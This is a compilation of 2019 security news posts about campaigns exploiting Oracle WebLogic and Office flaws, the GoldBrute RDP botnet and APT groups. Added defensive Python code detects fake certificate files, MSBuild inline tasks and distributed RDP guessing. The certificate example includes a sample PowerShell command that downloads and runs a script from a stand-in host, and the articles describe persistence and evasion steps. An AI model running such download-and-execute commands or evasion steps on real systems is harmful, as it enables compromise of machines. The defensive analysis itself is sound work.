The flaw is a deserialization remote command execution vulnerability, exploited as a zero-day before a fix was available, that affects the Oracle WebLogic wls9_async and wls-wsat components.

The issue affects all WebLogic versions (including the latest one at the time of disclosure) that have the wls9_async_response.war and wls-wsat.war components enabled.

Oracle WebLogic Server is a Java EE application server currently developed by Oracle Corporation, it is used by numerous applications and web enterprise portals based on Java technology.

An attacker could exploit the vulnerability to remotely execute commands without authorization by sending a specially crafted HTTP request.

The CVE-2019-2725 flaw was patched in late April; unfortunately, a few days later threat actors started exploiting the Oracle WebLogic Server vulnerability to deliver the Sodinokibi ransomware.

After the publication of the security advisory, experts at the SANS Institute reported that the flaw was already being actively exploited in cryptojacking campaigns. Experts at Trend Micro now confirm the SANS report and add that the attackers are using an interesting obfuscation technique.

The malware used in this campaign hides its malicious code in certificate files to evade detection.

CVE-2019-2725 cryptojacking

The attackers exploit the CVE-2019-2725 flaw to execute a command that performs a series of routines.

“The purpose of the command is to perform a series of routines. First, PowerShell (PS) is used to download a certificate file from the command-and-control (C&C) server and save it under %APPDATA% using the file name cert.cer (detected by Trend Micro as Coinminer.Win32.MALXMR.TIAOODCJ.component).” reads the analysis published by Trend Micro.

“It then employs the component CertUtil, which is used to manage certificates in Windows, to decode the file.”

The attack chain starts with a PowerShell command that downloads a certificate file from the C2 server. The malicious code uses the CertUtil tool to decode the file, then executes the result with PowerShell. The downloaded file is then deleted using cmd.

The downloaded file looks like a Privacy-Enhanced Mail (PEM) format certificate, but its Base64 body decodes to a PowerShell command rather than to an X.509 certificate of the kind used for TLS.

“One interesting characteristic of the downloaded certificate file is that it requires that it be decoded twice before the PS command is revealed, which is unusual since the command from the exploit only uses CertUtil once.” continues the experts. “There is also the possibility that the certificate file we downloaded is different from the file that was actually intended to be downloaded by the remote command, perhaps because it is continuously being updated by the threat actors.”
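The trick works because certutil -decode only strips the BEGIN/END armor and Base64-decodes whatever sits between, with no check that the result is DER. The following is an added example, not Trend Micro’s or the attackers’ code: it does the same unwrapping, repeats it for nested layers (the file above needed two passes), and reports whether a plausible DER certificate, printable command text or something else came out. The PowerShell command, the double-wrapped blob and the minimal DER sample are all constructed here; the command string is a stand-in, not the one from the campaign.

```python
"""Peel a 'certificate' file that is really an armored wrapper around a command.

Added example, not Trend Micro's or the attackers' code. Mirrors what
certutil -decode does (strip PEM armor, Base64-decode the body), repeats it
for nested layers, and classifies the final result. All samples are
constructed; the command text is a stand-in, not the campaign's.
"""
import base64
import re

PEM_BODY = re.compile(
    rb"-----BEGIN ([A-Z ]+)-----\s*(.*?)\s*-----END \1-----", re.S)
MAX_LAYERS = 5


def unwrap_once(blob):
    """Return the decoded PEM body, or None if blob is not valid PEM armor."""
    m = PEM_BODY.search(blob)
    if not m:
        return None
    body = b"".join(m.group(2).split())  # drop line breaks, as certutil does
    try:
        return base64.b64decode(body, validate=True)
    except ValueError:                    # binascii.Error is a ValueError
        return None


def is_der_certificate(data):
    """True if data is one DER SEQUENCE whose declared length matches (X.509 shape)."""
    if len(data) < 4 or data[0] != 0x30:
        return False
    if data[1] == 0x82:                      # long form, two length bytes
        return len(data) == int.from_bytes(data[2:4], "big") + 4
    if data[1] == 0x81:                      # long form, one length byte
        return len(data) == data[2] + 3
    if data[1] < 0x80:                       # short form
        return len(data) == data[1] + 2
    return False


def peel(blob):
    """Decode nested PEM layers; return (kind, layers, payload).

    kind is 'certificate' (DER came out), 'text' (printable command text),
    'binary' (something else) or 'not-pem' (no armor at all)."""
    layers, current = 0, blob
    while layers < MAX_LAYERS:
        inner = unwrap_once(current)
        if inner is None:
            break
        layers += 1
        current = inner
        if is_der_certificate(current):
            return "certificate", layers, current
    if layers == 0:
        return "not-pem", 0, blob
    try:
        text = current.decode("utf-8")
    except UnicodeDecodeError:
        return "binary", layers, current
    if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return "text", layers, text
    return "binary", layers, current


def armor(data):
    """Wrap bytes in certificate-style PEM armor, as the attackers' file did."""
    b64 = base64.encodebytes(data).replace(b"\n", b"\r\n")
    return b"-----BEGIN CERTIFICATE-----\r\n" + b64 + b"-----END CERTIFICATE-----\r\n"


# Constructed stand-in for the command hidden in the real file (hostname is invented).
SAMPLE_COMMAND = (b"powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                  b".DownloadString('http://example.invalid/update.ps1')\"")
DOUBLE_WRAPPED = armor(armor(SAMPLE_COMMAND))          # needs two decodes, like the sample above
REAL_LOOKING_CERT = armor(b"\x30\x82\x00\x04\x02\x02\x01\x00")  # minimal DER SEQUENCE

if __name__ == "__main__":
    for name, blob in [("double-wrapped", DOUBLE_WRAPPED), ("der", REAL_LOOKING_CERT)]:
        kind, layers, payload = peel(blob)
        print(name, kind, layers, payload if kind == "text" else len(payload))
```

A sandbox or mail gateway that sees certutil -decode on a freshly downloaded “.cer” can run the same check on the file: anything that decodes to printable text, or that needs more than one layer to become anything at all, is not a certificate and deserves a closer look.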

The command in the certificate file is used by the crooks to download and execute another PowerShell script in memory. That script downloads and executes multiple files, including Sysupdate.exe (a Monero miner), Config.json (the configuration file for the miner), Networkservice.exe (likely used for propagation and exploitation of WebLogic), Update.ps1 (the PowerShell script run in memory), Sysguard.exe (a watchdog for the miner process), and Clean.bat (which deletes other components).

The experts noticed that the update.ps1 file containing the decoded certificate file is replaced with the new update.ps1, and a scheduled task is created to execute the new PowerShell script every 30 minutes.

The idea of hiding malware in certificate files is not new; experts at Sophos explored this technique in a proof of concept late last year.

“However, oddly enough, upon execution of the PS command from the decoded certificate file, other malicious files are downloaded without being hidden via the certificate file format mentioned earlier.” concludes Trend Micro. “This might indicate that the obfuscation method is currently being tested for its effectiveness, with its expansion to other malware variants pegged at a later date,”

Pierluigi Paganini

(SecurityAffairs – CVE-2019-2725, Oracle WebLogic)

The post CVE-2019-2725 Oracle WebLogic flaw exploited in cryptojacking campaign appeared first on Security Affairs.

Malware peddlers hit Office users with old but reliable exploit

Emails delivering RTF files equipped with an exploit that requires no user interaction (except for opening the booby-trapped file) are hitting European users’ inboxes, Microsoft researchers have warned. Exploit delivers backdoor The exploit takes advantage of a vulnerability in an older version of the Office Equation Editor, which was manually patched by Microsoft in November 2017. “The CVE-2017-11882 vulnerability was fixed in 2017, but to this day, we still observe the exploit in attacks. Notably, … More

The post Malware peddlers hit Office users with old but reliable exploit appeared first on Help Net Security.

Security Affairs newsletter Round 217 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.


Once again thank you!

ESET analyzes Turla APTs usage of weaponized PowerShell
Leicester City Football Club disclosed a card breach
ProtonMail denies that it spies on users for government agencies
Expert shows how to Hack a Supra Smart Cloud TV
Gaining Root Access to Host through rkt Container hack
Google is taking action on deceptive installation tactics for Chrome Browser Extensions
Google outages in Eastern US affected Gmail, G-Suite, YouTube, and more
Threat actors abuse Microsoft Azure to Host Malware and C2 Servers
A month later Gamaredon is still active in Eastern Europe
Australian teenager hacked into Apple twice for a job
CVE-2019-9510 flaw allows hackers to bypass Windows lock screen on RDP sessions
macOS zero-day in Mojave could allow Synthetic Clicks attacks
OilRigs Jason email hacking tool leaked online
BlackSquid malware uses multiple exploits to drop cryptocurrency miners
Expert developed a MetaSploit module for the BlueKeep flaw
NSA urges Windows Users and admins to Patch BlueKeep flaw
Tens of Million patients impacted by the AMCA data breach
The Australian National University suffered a major, sophisticated attack
0patch experts released unofficial Patch Available for Recent Windows 10 Task Scheduler Zero-Day
Analyzing the APT34s Jason project
Cisco disclosed several flaws in Cisco Industrial Network Director
Platinum APT and leverages steganography to hide C2 communications
Remote code execution flaw in Ministra IPTV Platform exposes user data and more
Tor Project released Tor Browser 8.5.1 for Windows, Mac, Linux, and Android
VMware addressed flaws in its Workstation and Tools
Crooks stole about $10 million from GateHub cryptocurrency wallet service
Cryptocurrency startup Komodo hacks itself to protect its users funds from hackers
Fort Worth IT Professionals Fired for Reporting Cybersecurity Issues: What We Know
New GoldBrute Botnet is attempting to infect 1.5 Million RDP Servers
SandboxEscaper releases Byebear exploit to bypass patched EoP flaw
Frankenstein campaign: threat actors put together open-source tools for highly-targeted attacks
Hunting the ICEFOG APT group after years of silence
Recently a large chunk of European mobile traffic was rerouted through China Telecom

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 217 – News of the week appeared first on Security Affairs.

Hunting the ICEFOG APT group after years of silence

A security researcher found new evidence of activities conducted by the ICEFOG APT group, also tracked by the experts as Fucobha.

Chi-en (Ashley) Shen, a senior security researcher at FireEye, collected evidence that demonstrates that China-linked APT group ICEFOG (aka Fucobha) is still active.

The activities of the APT group were first uncovered by Kaspersky Lab in September 2013. At the time the researchers described the crew as an emerging group of cyber-mercenaries able to carry out surgical hit-and-run operations against strategic targets. The cyber-mercenaries were hired by governments and private companies, and the group was composed of highly skilled hackers able to conduct sophisticated attacks.

The APT group is considered a persistent collector of sensitive information; the Kaspersky team detected a series of attacks against the defense supply chain (e.g. military contractors, shipbuilders, satellite operators, high-tech companies) in Japan and South Korea.

The ICEFOG team also targeted companies in the energy industry in the US; the threat actors used a custom backdoor dubbed “Fucobha”, which included exploits for both Microsoft Windows and Mac OS X.

At the time the “hit and run” nature of the operations appeared unusual: the attackers processed victims rapidly, stole only the information of interest, and showed a deep knowledge of the targets and of the information they were looking for.

The group of hackers went dark just after Kaspersky shared the findings of its investigation in September 2013.

This week, Chi-en (Ashley) Shen presented at the CONFidence cybersecurity conference held in Poland her analysis on new samples of malware associated with the ICEFOG group.

Two of them, tracked as ICEFOG-P and ICEFOG-M, have been used in targeted attacks in 2014 and 2018, respectively. Samples of both variants were compiled between 2014 and 2019.


Both ICEFOG-P and ICEFOG-M are more complex than the original backdoor, a circumstance that suggests the threat actors have continued to develop and use it.

ICEFOG-M is the latest variant; it is fileless malware that supports the same features as ICEFOG-P but uses HTTPS for communications.

The researcher explained that the ICEFOG-P variant is not particularly complex; it remained under the radar simply because it was rarely used.

The researcher also spotted a Mac version of the malware, tracked as MacFog, that was previously unknown to the security community. MacFog was initially distributed on Chinese forums.

Unlike the operations observed between 2011 and 2013, the new malware variants were involved in multiple campaigns conducted by different groups.

Shen spotted variants of the ICEFOG malware in attacks targeting:

  • an unnamed agriculture company in Europe in 2015
  • government, media, and finance organizations in Russia and Mongolia in 2015 (TOPNEWS campaign)
  • the government of multiple former Soviet states in 2015 (Roaming Tiger)
  • Kazakh officials in 2016 (APPER campaign)
  • water source provider, banks, and government entities in Turkey, India, Kazakhstan, Uzbekistan, and Tajikistan in 2018 (WATERFIGHT campaign)
  • an unknown entity in the Philippines in 2018 (PHKIGHT campaign)
  • organizations in Turkey and Kazakhstan in 2018 and 2019 (SKYLINE campaign)

In the latest campaign, tracked as SKYLINE and observed in 2019, the hackers targeted Turkey and Kazakhstan; the timestamps suggest the campaign may have been active since at least 2018. The attackers leveraged a shared CVE-2017-11882 exploit template and used a fileless version of ICEFOG-M.

icefog attacks timeline

According to Shen, most samples were involved in cyber espionage campaigns, and the threat actors appear to be politically motivated.

Below are the conclusions of the excellent analysis conducted by Shen:

  • ICEFOG is malware shared among Roaming Tiger, APT15, Temp Group A and suspected APT9.
  • Shared malware is a pitfall for attribution, we should not do attribution only based on malware.
  • Temp Group A is aggressively using ICEFOG-P and ICEFOG-M to target Russia, Kazakhstan, Tajikistan, Uzbekistan and Turkey.
  • With the file-less ICEFOG-M, host-based detection for payloads is more difficult.
  • Continued development indicates there could be more attacks leveraging ICEFOG in future campaigns, and possibly leveraged by more attackers

Pierluigi Paganini

(SecurityAffairs – cyberespionage, hacking)

The post Hunting the ICEFOG APT group after years of silence appeared first on Security Affairs.

Frankenstein campaign: threat actors put together open-source tools for highly-targeted attacks

Cisco Talos experts uncovered a new wave of attacks tracked as Frankenstein campaign, attackers used tools built by combining four open-source techniques.

Security experts at Cisco Talos uncovered a series of highly targeted attacks, tracked as Frankenstein campaign, hackers used tools built by combining four different open-source techniques.

Attackers behind the Frankenstein campaign carried out several malware-based attacks between January and April 2019. Talos researchers discovered a low volume of documents in various malware repositories.

“Cisco Talos recently identified a series of documents that we believe are part of a coordinated series of cyber attacks that we are calling the Frankenstein campaign.” reads the analysis published by Cisco Talos. “We assess that this activity was hyper-targeted given that there was a low volume of these documents in various malware repositories. Frankenstein — the name refers to the actors’ ability to piece together several unrelated components — leveraged four different open-source techniques to build the tools used during the campaign.”

Researchers at Talos team believe the attackers are moderately sophisticated but highly resourceful.

The attackers used multiple anti-detection techniques, such as checking whether analysis tools like Process Explorer were running in the background and determining whether the malicious code was running in a virtualized environment.

Other anti-detection measures included responding only to GET requests that contained predefined fields and using encryption to protect data in transit.

Talos experts identified two weaponized Word documents used in the Frankenstein campaign that were likely sent to the victims via email. The first document, named “MinutesofMeeting-2May19.docx”, displays the national flag of Jordan; once opened it fetches a remote template and triggers the CVE-2017-11882 exploit to execute code on the target machine.

“Once the victim opens the document, it fetches a remote template from the actor-controlled website, hxxp://droobox[.]online:80/luncher.doc. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim’s machine. After the exploit, the file would run a command script to set up persistence as a scheduled task named “WinUpdate”.” continues the analysis. 

“/Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR” That scheduled task would run a series of base64-encoded PowerShell commands that acted as a stager.”

frankenstein campaign

The second sample prompts the victim to enable macros and run a Visual Basic script. 

One of the documents detected by the experts appears to have been created by the security firm Kaspersky; in two other cases the attackers used documents specifically designed to target Middle Eastern entities.

Experts also described a

In the second scenario observed by Talos, the threat actors used a weaponized document that, once the macro is enabled, executes a Visual Basic for Applications (VBA) script implementing two anti-analysis features. 

The script first queries Windows Management Instrumentation (WMI) to check if specific applications are running: VMWare, Vbox, Process Explorer, Process Hacker, ProcMon, Visual Basic, Fiddler, and WireShark. Then the script checks if specific tasks are running: VMWare, Vbox, VxStream, AutoIT, VMtools, TCPView, WireShark, Process Explorer, Visual Basic, and Fiddler. 

If the script finds one of the above applications or tasks it halts execution; otherwise it queries WMI for the number of cores allocated to the system and exits if there are fewer than two. 

Once the evasion checks are complete, the attackers use MSBuild to execute an actor-created file named “LOCALAPPDATA\Intel\instal.xml”. According to Talos, the threat actors chose MSBuild because it is a signed Microsoft binary, which lets them bypass application whitelisting controls on the host while using it to execute arbitrary code. 
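MSBuild runs arbitrary code from a project file in two documented ways: a <UsingTask> whose TaskFactory is CodeTaskFactory (or RoslynCodeTaskFactory) carries C# or VB source in a <Code> element that MSBuild compiles and executes, and an <Exec> task runs a shell command line. A project file dropped under a user profile and handed to MSBuild, as in the step above, will use one of these. The following is an added example, not Cisco Talos’s or the attackers’ code: a small scanner that parses a project file and reports inline-task and Exec usage. The sample project (its task name, the C# stub inside it, and the benign project used for contrast) is constructed for the example and is not the real instal.xml.

```python
"""Flag MSBuild project files that carry inline code or shell commands.

Added example, not Cisco Talos's or the attackers' code. MSBuild compiles
and runs source placed in a <UsingTask> with TaskFactory="CodeTaskFactory"
(or "RoslynCodeTaskFactory") and runs <Exec Command="..."/> steps; both are
how a signed Microsoft binary ends up executing attacker-supplied code.
The sample projects below are constructed for the example.
"""
import xml.etree.ElementTree as ET

INLINE_FACTORIES = {"codetaskfactory", "roslyncodetaskfactory"}


def _local(tag):
    """Strip the MSBuild XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def find_inline_code(project_xml):
    """Return findings as (kind, name_or_command, snippet) tuples for one project."""
    root = ET.fromstring(project_xml)
    findings = []
    for el in root.iter():
        name = _local(el.tag)
        if name == "UsingTask":
            factory = el.get("TaskFactory", "").lower()
            if factory in INLINE_FACTORIES:
                code = next((c for c in el.iter() if _local(c.tag) == "Code"), None)
                snippet = (code.text or "").strip()[:60] if code is not None else ""
                findings.append(("inline-task", el.get("TaskName", "?"), snippet))
        elif name == "Exec":
            findings.append(("exec", el.get("Command", "")[:60], ""))
    return findings


def is_suspicious(project_xml):
    """True if the project would make MSBuild compile inline code or run a command."""
    return bool(find_inline_code(project_xml))


# Constructed sample: the shape of an attacker-supplied project. Task name and
# C# stub are invented; the UsingTask/Task/Code layout is MSBuild's own.
SAMPLE_PROJECT = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Run">
    <Stage />
  </Target>
  <UsingTask TaskName="Stage" TaskFactory="CodeTaskFactory"
             AssemblyFile="$(MSBuildToolsPath)\\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Class" Language="cs"><![CDATA[
using System;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class Stage : Task {
    public override bool Execute() {
        // a real dropper would decode and run its payload here
        return true;
    }
}
      ]]></Code>
    </Task>
  </UsingTask>
</Project>
"""

# A benign build file for contrast: compiles sources, no inline code, no Exec.
BENIGN_PROJECT = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemGroup><Compile Include="Program.cs" /></ItemGroup>
  <Target Name="Build"><Csc Sources="@(Compile)" OutputAssembly="app.exe" /></Target>
</Project>
"""

if __name__ == "__main__":
    for label, proj in [("sample", SAMPLE_PROJECT), ("benign", BENIGN_PROJECT)]:
        print(label, find_inline_code(proj))
```

Inline tasks are legitimate in real build trees, so the useful signal is context: an MSBuild process whose project file lives under a user profile directory (LOCALAPPDATA, TEMP, Downloads) and contains a <Code> element, rather than inline code anywhere at all.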

Attackers used a PowerShell Empire agent to gather information on the local system, including Username, Domain name, Machine name, Public IP address, administrative privileges, currently running processes, operating system version, and the security system’s SHA256 HMAC. 

Then the data is sent back to the C&C server via an encrypted channel.

“A campaign that leverages custom tools is more easily attributed to the tools’ developers. One example of this was the code overlap in the VPNFilter malware that allowed us to associate the activity with the BlackEnergy malware.” Talos concludes. “By contrast, operations performed with open-source frameworks are extremely difficult to attribute without additional insights or intelligence.”

Pierluigi Paganini

(SecurityAffairs – Frankenstein campaign, hacking)

The post Frankenstein campaign: threat actors put together open-source tools for highly-targeted attacks appeared first on Security Affairs.

Cyber News Rundown: Medical Testing Service Data Breach


Quest Diagnostics Customers Affected by Third-Party Breach

The medical testing organization Quest Diagnostics has fallen victim to a third-party data breach that could affect nearly 12 million of its patients. AMCA, a collections agency that works with Quest Diagnostics, noticed unauthorized access to its systems over an eight-month period from August of last year through March 2019. The majority of the data targeted were Social Security Numbers and other financial documents, rather than patients’ health records. The market offers a premium for such data.

Adware Installed by Millions of Android Users

Until recently, there were over 230 apps on the Google Play store that had been compromised by a malicious plugin that forced out-of-app advertisements on unsuspecting victims. Globally, over 440 million individuals have installed at least one of these compromised applications and have been affected by overly-aggressive advertisements. While this SDK has been used legitimately for nearly a year, sometime during 2018 the plugin began performing increasingly malicious behaviors, until other developers caught on and began updating their own applications to remove the plugin. 

Chinese Database Exposes Millions of Records

A database belonging to FMC Consulting, a headhunting firm based in China, was recently found by researchers to be publicly available. Among the records are resumes and personally identifiable information for millions of individuals, as well as company data with thousands of recorded messages and emails. Unfortunately for anyone whose information is contained within this database, in the two weeks since being notified of the breach FMC has yet to acknowledge it or take steps to secure the data.

Restaurant Payment Systems Infected

Customers who’ve patronized either Checkers or Rally’s restaurants in recent months are being urged to monitor their credit cards after the chain announced that it discovered card-stealing malware on its internal systems. While not all restaurant locations were affected, the company is still working to determine the extent of the compromised payment card systems and has offered credit monitoring services to customers.

University of Chicago Medicine Server Found Online

Researchers have found a server belonging to University of Chicago Medicine with personal information belonging to more than 1.6 million current and past donors. The data includes names, addresses, and even marital and financial information for each donor. Fortunately, the researcher was quick to inform the university of the unsecured ElasticSearch server and it was taken down within 48 hours.

The post Cyber News Rundown: Medical Testing Service Data Breach appeared first on Webroot Blog.

Threatlist: Targeted Espionage-as-a-Service Takes Hold on the Dark Web

One in four underground merchants offer advanced hacking services, once reserved for APTs and well-funded organized crime gangs.

The Endless Scourge of Malicious Email

There is no question that unwanted email is a source of annoyance. It is also the biggest source of cyber threats. In fact, just last month, spam accounted for 85 percent of all email sent. Plus, according to Verizon’s 2018 Data Breach Investigations Report, email is the number one vector for both malware distribution (92.4 percent) and phishing (96 percent). Attackers know that, unfortunately, this channel just works.

Because email forces the user to stop and at least scan every message they receive, it presents the perfect opportunity to serve up malicious links and file attachments that people in a hurry sometimes mistakenly click on. Phishing and social engineering have gotten so sophisticated that it can be hard for even cyber-savvy users to discern the legitimate from the malicious.

Our most recent CISO Benchmark Study showed that 56 percent of CISOs we surveyed felt that defending against the user behavior of clicking a malicious link in an email is very or extremely challenging. This ranks higher than any other security concern surveyed—higher than data in the public cloud, and even higher than mobile device use.

The risk becomes evident when looking at simulated phishing campaigns carried out as part of Duo Insight, a tool that allows users to craft fake phishing campaigns in order to test and educate users within their organization. Duo’s 2018 research showed that 62 percent of phishing simulation campaigns captured at least one set of user credentials. Of all the recipients, almost a quarter clicked the phishing link in the email and half of them entered credentials into a fake website.

In a separate Cisco survey commissioned last year, 70 percent of those respondents reported that protecting against email threats is becoming more difficult. Regarding the consequences of email-borne attacks, 75 percent of respondents said they experienced significant operational impacts, and 47 percent reported significant financial impacts.

The picture is grim, and sadly, the numbers are trending up. Overall volume of spam email is currently at a 15-month high, according to Talos Intelligence data, and the number of new phishing domains has shown a 64 percent increase from January through March 2019, indicating that attackers could be gearing up for more phishing attacks.

While the following preventive steps have been recommended many times by many sources, given the continued increase in successful email attacks, they are worth repeating. At Cisco, we practice all of them regularly as part of our foundational and extensive security efforts – and it’s paid off through significant declines in email-based compromises of our network.

  • Run regular phishing exercises to teach employees how to recognize even highly tailored and sophisticated phishing attempts and report them
  • Use multi-factor authentication to prevent attackers from gaining access to accounts
  • Keep software up to date – email gateways, apps, operating systems, browsers, plug-ins; just make time to patch
  • Never wire money to a stranger – set up strict policies that require high-ranking authorization of wire-transfers; have a designated secondary signature requirement
  • Stop and think – does the message in the email sound technically plausible? Does the pitch make sense? Are there holes in the requester’s story?
  • Users – check the sender’s email address against the message signatory – do they match? If not, don’t touch it!

As has long been the case, a layered approach to security is critical in defending your organization from email-borne attacks. Traditional approaches like spam blockers, malware and URL blockers and integrated sand-boxing remain must-haves. There are also new technologies like DMARC, machine learning, email remediation and several others that will help all organizations keep up with the always changing email threat landscape.

We invite you to download our full report Email: Click with Caution – How to protect against phishing, fraud, and other scams…

Learn more about Cisco Email Security Advanced Phishing Protection here.

The post The Endless Scourge of Malicious Email appeared first on Cisco Blog.

New GoldBrute Botnet is attempting to infect 1.5 Million RDP Servers

A new botnet tracked as GoldBrute is scanning the web for Windows machines with Remote Desktop Protocol (RDP) connection enabled.

A new botnet tracked as GoldBrute has appeared in the threat landscape, it is scanning the web for Windows machines with Remote Desktop Protocol (RDP) connection enabled.

The botnet is currently targeting over 1.5 million unique endpoints online; it is used to brute-force RDP connections and to carry out credential stuffing attacks.

“This botnet is currently brute forcing a list of about 1.5 million RDP servers exposed to the Internet. Shodan lists about 2.4 million exposed servers [1]. GoldBrute uses its own list and is extending it as it continues to scan and grow.” wrote the researcher Renato Marinho of Morphus Labs, who discovered the bot.

The GoldBrute botnet currently has a single command and control server (104[.]156[.]249[.]231), its bots exchange data with the C2 via AES encrypted WebSocket connections to port 8333. 

Querying the Shodan search engine for systems with RDP enabled it is possible to find roughly 2.4 million machines.

“An infected system will first be instructed to download the bot code. The download is very large (80 MBytes) and includes the complete Java Runtime. The bot itself is implemented in a Java class called GoldBrute” continues the expert.

“Initially, the bot will start scanning random IP addresses to find more hosts with exposed RDP servers. These IPs are reported back to the C&C server. After the bot reported 80 new victims, the C&C server will assign a set of targets to brute force to the bot.” 

GoldBrute botnet

Below the complete attack chain:

  • Botnet brute-forces RDP connection and gains access to a poorly protected Windows system.
  • It downloads a big zip archive containing the GoldBrute Java code and the Java runtime itself. It uncompresses and runs a jar file called “bitcoin.dll”.
  • The bot will start to scan the internet for “brutable” RDP servers and send their IPs to the C2 that in turn sends a list of IP addresses to brute force.
  • GoldBrute bot gets different “host + username + password”  combinations.
  • Bot performs brute-force attack and reports result back to C2 server.

According to the researcher, the list of “brutable” RDP targets is growing rapidly, which suggests that the botnet itself is growing too.

“Analyzing the GoldBrute code and understanding its parameters and thresholds, it was possible to manipulate the code to make it save all “host + username + password” combinations on our lab machine.” continues the expert.

“After 6 hours, we received 2.1 million IP addresses from the C2 server from which 1,596,571 are unique. Of course, we didn’t execute the brute-force phase. With the help of an ELK stack, it was easy to geolocate and plot all the addresses in a global world map, as shown below.”

goldbrute botnet map

The GoldBrute botnet is difficult to detect because every bot only launches one password-guessing attempt per victim.
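Because each bot makes a single attempt per target, per-source lockout rules never fire; the signal is instead many distinct sources each failing once against the same host. As an added example (not code from the Morphus Labs report), the Python below correlates constructed, simplified Windows Security 4625 records by target host and sliding window, counting only sources that sent at most one failure; host names and TEST-NET addresses are constructed.

```python
import json
from collections import defaultdict, deque
from datetime import datetime, timedelta


def _event(ts, host, ip, user, logon_type, event_id=4625):
    """Build one constructed log line: a simplified JSON rendering of the
    Windows Security event (4625 = failed logon, 4624 = successful logon)."""
    return json.dumps({"ts": ts, "EventID": event_id, "LogonType": logon_type,
                       "Computer": host, "IpAddress": ip, "TargetUserName": user})


# Constructed sample log. 25 different sources (TEST-NET-3 addresses) each try
# exactly one password against SRV01 within eight minutes, the GoldBrute
# pattern; one admin mistypes a password four times on SRV02, the pattern a
# per-source lockout already handles; a successful type-10 logon and a type-3
# failure are noise that the filter must ignore.
SAMPLE_LOG = [
    _event(f"2019-06-06T10:{i // 3:02d}:{(i % 3) * 20:02d}", "SRV01",
           f"203.0.113.{i + 1}", "administrator", 10)
    for i in range(25)
] + [
    _event(f"2019-06-06T10:01:{sec:02d}", "SRV02", "10.0.0.5", "jsmith", 10)
    for sec in (5, 9, 14, 20)
] + [
    _event("2019-06-06T10:02:00", "SRV01", "10.0.0.7", "backupsvc", 10, event_id=4624),
    _event("2019-06-06T10:02:30", "SRV03", "203.0.113.99", "guest", 3),
]


def parse_event(line):
    ev = json.loads(line)
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%S")
    return ev


def distributed_rdp_guessing(lines, window=timedelta(minutes=10),
                             min_sources=20, max_per_source=1, logon_types=(10,)):
    """Return {host: distinct_sources} for every host that, inside one sliding
    `window`, received failed logons from at least `min_sources` distinct
    addresses that each sent no more than `max_per_source` attempts.

    Sources that hammer a host are deliberately left out of the count: a
    per-source threshold already catches them, and GoldBrute never trips it.
    Caveat: with Network Level Authentication enabled, failed RDP logons are
    recorded as LogonType 3 rather than 10, so pass logon_types=(3, 10) there.
    """
    events = sorted((parse_event(line) for line in lines), key=lambda e: e["ts"])
    recent = defaultdict(deque)  # host -> failed logons inside the window
    alerts = {}
    for ev in events:
        if ev["EventID"] != 4625 or ev["LogonType"] not in logon_types:
            continue
        host = ev["Computer"]
        queue = recent[host]
        queue.append(ev)
        while ev["ts"] - queue[0]["ts"] > window:
            queue.popleft()
        per_source = defaultdict(int)
        for e in queue:
            per_source[e["IpAddress"]] += 1
        quiet = [ip for ip, n in per_source.items() if n <= max_per_source]
        if len(quiet) >= min_sources:
            alerts[host] = max(alerts.get(host, 0), len(quiet))
    return alerts


if __name__ == "__main__":
    print(distributed_rdp_guessing(SAMPLE_LOG))  # {'SRV01': 25}
```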

The report published by Marinho also includes a list of IoCs.

Pierluigi Paganini

(SecurityAffairs – GoldBrute botnet, hacking)


Criminals are selling hacking services targeting world’s biggest companies

A new study – undertaken by Dr. Mike McGuire, Senior Lecturer in Criminology at the University of Surrey, and underwritten by Bromium – provides details of first-hand intelligence gathered from covert discussions with dark net vendors, alongside analysis by a panel of global industry experts across law enforcement and government. Key findings: 4 in 10 dark net vendors are selling targeted hacking services aimed at FTSE …


Platinum APT leverages steganography to hide C2 communications

The Platinum cyber espionage group uses a steganographic technique to hide communications with its command and control (C&C) servers.

Experts from Kaspersky have linked the Platinum APT group with cyber attacks involving an elaborate new steganographic technique used to hide communications with C2 servers.

The APT group was discovered by Microsoft in 2016, when it targeted organizations in South and Southeast Asia. According to Microsoft, Platinum has been active since at least 2009 and was responsible for spear phishing attacks on ISPs, government organizations, intelligence agencies, and defense institutes.

Given the nature of the targeted entities and the group’s TTPs, the hackers don’t appear to be financially motivated.

In June 2018, experts at Kaspersky were investigating attacks against government and military entities in South and Southeast Asian countries. The experts tracked the campaign as EasternRoppels; they speculate it may have started as far back as 2012.

“In June 2018, we came across an unusual set of samples spreading throughout South and Southeast Asian countries targeting diplomatic, government and military entities. The campaign, which may have started as far back as 2012, featured a multi-stage approach and was dubbed EasternRoppels.” reads the analysis published by the expert. “The actor behind this campaign, believed to be related to the notorious PLATINUM APT group, used an elaborate, previously unseen steganographic technique to conceal communication.”

The attack chain starts with WMI subscriptions to run an initial PowerShell downloader and fetch another small PowerShell backdoor for system fingerprinting and downloading additional code. 

The initial WMI PowerShell scripts observed in different attacks were using different hardcoded command and control (C&C) IP addresses, different encryption keys, salt for encryption and different active hours.

The threat actor hosted the C&C addresses on free hosting services and used a large number of Dropbox accounts to store the malicious code and the exfiltrated data.

Kaspersky spotted a backdoor while investigating another threat; further analysis allowed its experts to determine that it was a second-stage malware used in one of the Platinum campaigns.

“We were able to find a backdoor that was implemented as a DLL and worked as a WinSock NSP (Nameservice Provider) to survive a reboot. The backdoor shares several features with the PowerShell backdoor described above: it has hardcoded active hours, it uses free domains as C&C addresses, etc.” continues Kaspersky.

The researchers discovered that the same domain was used to store exfiltrated data in both attacks. The analysis of the encrypted files used in the second stage revealed a previously undiscovered backdoor associated with the Platinum group.

The hackers used a dropper to install the steganography backdoor: the malicious code creates directories for the backdoor and saves the backdoor-related files in these folders. The dropper then runs the backdoor, sets up a persistence mechanism, and removes itself.

Once the backdoor is installed on a target machine, it connects to the C&C server and downloads an HTML page that contains embedded commands, encrypted with a key that is also embedded in the page.

